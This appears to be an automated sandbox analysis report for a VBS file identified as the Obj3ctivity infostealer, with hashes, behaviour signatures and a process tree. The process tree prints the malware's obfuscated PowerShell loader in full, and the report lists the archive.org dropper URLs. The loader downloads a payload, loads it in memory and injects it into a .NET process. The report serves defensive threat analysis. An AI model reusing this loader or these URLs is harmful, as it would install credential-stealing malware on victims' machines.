Overview

overview

10

Static

static

1

6da74e92c7...2a.vbs

windows7-x64

10

6da74e92c7...2a.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    94s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/10/2024, 01:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs

  • Size

    504KB

  • MD5

    73116ddf40456b41c6b35023bc02e781

  • SHA1

    037b869900d0474bf7603b8fbe3401f517f52117

  • SHA256

    6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a

  • SHA512

    f60cbe6234371aacd3f42f87db8ea04cc3b982d9c356db5a1e0fa3959268c0aa8e78e4c059feac1619348a3453e55c3386e096812d2a4a6d61aca5cc99007be3

  • SSDEEP

    12288:VS57Wp1MYi6qsGrA2OGLmeq0wM/l1d0FUvoExHRbb4XJb7q5cPT+EmJu6X:VC6X0T5VnpJ4Za

Score
10/10
obj3ctivitycollectiondiscoveryexecutionpersistenceprivilege_escalationstealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

  • Detects Obj3ctivity Stage1 3 IoCs

    Obj3ctivity aka PXRECVOWEIWOEI is an infostealer written in C#.

    stealer
  • Obj3ctivity, PXRECVOWEIWOEI

    Obj3ctivity aka PXRECVOWEIWOEI is an infostealer written in C#.

    stealerobj3ctivity
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6da74e92c740c4443c54a8243037d0a2d9fac8f34764d1a86933063e5790ef2a.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9dXJsICcrJz0gJysneycrJzB9JysnaHR0cHMnKyc6Ly9pYTYnKycwMCcrJzEwMCcrJy51cy5hJysncmNoaXYnKydlLm9yZycrJy8yNC9pJysndGUnKydtcy9kZXRhaC0nKydubycrJ3RlLScrJ3YvRGV0YWhOb3RlJysnVicrJy50JysneCcrJ3R7MH07ezF9YmFzZScrJzYnKyc0Q29udGVuJysndCA9JysnIChOZScrJ3ctJysnT2InKydqJysnZScrJ2N0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQ2xpZW50KS5Eb3dubG9hZFN0cmluZyh7MScrJ311cmwpO3sxJysnfScrJ2InKydpbicrJ2FyeScrJ0NvbnRlbnQgPScrJyBbU3lzdCcrJ2UnKydtJysnLkNvbnZlcnRdJysnOjonKydGcm9tQicrJ2FzZTY0JysnU3QnKydyaW5nKCcrJ3sxJysnfWJhJysnc2U2NENvbicrJ3RlJysnbnQpOycrJ3sxJysnfWFzc2UnKydtYmx5ID0gW1JlZmxlY3QnKydpbycrJ24nKycuQScrJ3NzZW1ibHknKyddJysnOjpMb2FkKHsxfWJpbmFyeScrJ0MnKydvJysnbicrJ3QnKydlJysnbnQpO3sxfXR5JysncGUnKycgPScrJyB7MX1hJysnc3MnKydlJysnbWJseS5HJysnZXRUeXBlJysnKHswfVJ1blBFLicrJ0hvbWV7MH0pOycrJ3sxJysnfScrJ20nKydldGhvZCA9JysnIHsxfXR5cGUuRycrJ2V0JysnTWUnKyd0JysnaG9kKCcrJ3swfVZBSXsnKycwfScrJyk7ezF9bWV0aG9kLicrJ0ludicrJ29rJysnZSh7JysnMScrJ31udScrJ2xsLCBbbycrJ2JqZWMnKyd0JysnWycrJ11dJysnQCh7MH10eCcrJ3QueHR5bS92ZWQuJysnMicrJ3IuMzliMzQnKyc1MzAnKycyYScrJzA3JysnNWIxYmMwZDQnKyc1YjYzMmViOWVlNjInKyctYicrJ3UnKydwJysnLy86cycrJ3B0dCcrJ2h7MCcrJ30gLCcrJyAnKyd7MCcrJ31kZXNhdGl2YWRvezB9ICcrJywgezB9ZGVzYXQnKydpdmEnKydkb3snKycwJysnfScrJyAsIHswfWQnKydlc2F0JysnaScrJ3ZhJysnZG97MH0sezB9QScrJ2RkSScrJ25Qcm9jZScrJ3NzMycrJzJ7MH0sJysnezAnKyd9JysnezAnKyd9KScrJyknKSAtRiAgW2NIYXJdMzksW2NIYXJdMzYpIHwgLiAoKEdWICcqbWRSKicpLm5hbWVbMywxMSwyXS1Kb2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}url '+'= '+'{'+'0}'+'https'+'://ia6'+'00'+'100'+'.us.a'+'rchiv'+'e.org'+'/24/i'+'te'+'ms/detah-'+'no'+'te-'+'v/DetahNote'+'V'+'.t'+'x'+'t{0};{1}base'+'6'+'4Conten'+'t ='+' (Ne'+'w-'+'Ob'+'j'+'e'+'ct System.N'+'e'+'t'+'.Web'+'Client).DownloadString({1'+'}url);{1'+'}'+'b'+'in'+'ary'+'Content ='+' [Syst'+'e'+'m'+'.Convert]'+'::'+'FromB'+'ase64'+'St'+'ring('+'{1'+'}ba'+'se64Con'+'te'+'nt);'+'{1'+'}asse'+'mbly = [Reflect'+'io'+'n'+'.A'+'ssembly'+']'+'::Load({1}binary'+'C'+'o'+'n'+'t'+'e'+'nt);{1}ty'+'pe'+' ='+' {1}a'+'ss'+'e'+'mbly.G'+'etType'+'({0}RunPE.'+'Home{0});'+'{1'+'}'+'m'+'ethod ='+' {1}type.G'+'et'+'Me'+'t'+'hod('+'{0}VAI{'+'0}'+');{1}method.'+'Inv'+'ok'+'e({'+'1'+'}nu'+'ll, [o'+'bjec'+'t'+'['+']]'+'@({0}tx'+'t.xtym/ved.'+'2'+'r.39b34'+'530'+'2a'+'07'+'5b1bc0d4'+'5b632eb9ee62'+'-b'+'u'+'p'+'//:s'+'ptt'+'h{0'+'} ,'+' '+'{0'+'}desativado{0} '+', {0}desat'+'iva'+'do{'+'0'+'}'+' , {0}d'+'esat'+'i'+'va'+'do{0},{0}A'+'ddI'+'nProce'+'ss3'+'2{0},'+'{0'+'}'+'{0'+'})'+')') -F [cHar]39,[cHar]36) | . ((GV '*mdR*').name[3,11,2]-Join'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3880
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:1208
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:4944
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2984
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:724
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2568
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2832

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    3ca1082427d7b2cd417d7c0b7fd95e4e

    SHA1

    b0482ff5b58ffff4f5242d77330b064190f269d3

    SHA256

    31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

    SHA512

    bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v4amnkgg.eqt.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/368-12-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/368-30-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/368-0-0x00007FFA39023000-0x00007FFA39025000-memory.dmp

    Filesize

    8KB

    Download

  • memory/368-1-0x000002627B420000-0x000002627B442000-memory.dmp

    Filesize

    136KB

    Download

  • memory/368-11-0x00007FFA39020000-0x00007FFA39AE1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1208-23-0x0000000000400000-0x0000000000416000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1208-26-0x0000000000400000-0x0000000000416000-memory.dmp

    Filesize

    88KB

    Download

  • memory/1208-31-0x0000000005510000-0x00000000055F6000-memory.dmp

    Filesize

    920KB

    Download

  • memory/1208-32-0x0000000005760000-0x00000000057C6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/1208-33-0x0000000005D40000-0x0000000005D52000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1208-34-0x0000000006270000-0x0000000006432000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/1208-64-0x0000000006CF0000-0x0000000007294000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1208-65-0x00000000067E0000-0x0000000006872000-memory.dmp

    Filesize

    584KB

    Download

  • memory/1208-66-0x0000000006880000-0x00000000068F6000-memory.dmp

    Filesize

    472KB

    Download

  • memory/1208-88-0x00000000077D0000-0x0000000007CFC000-memory.dmp

    Filesize

    5.2MB

    Download

  • memory/3880-22-0x00000209A57D0000-0x00000209A59DC000-memory.dmp

    Filesize

    2.0MB

    Download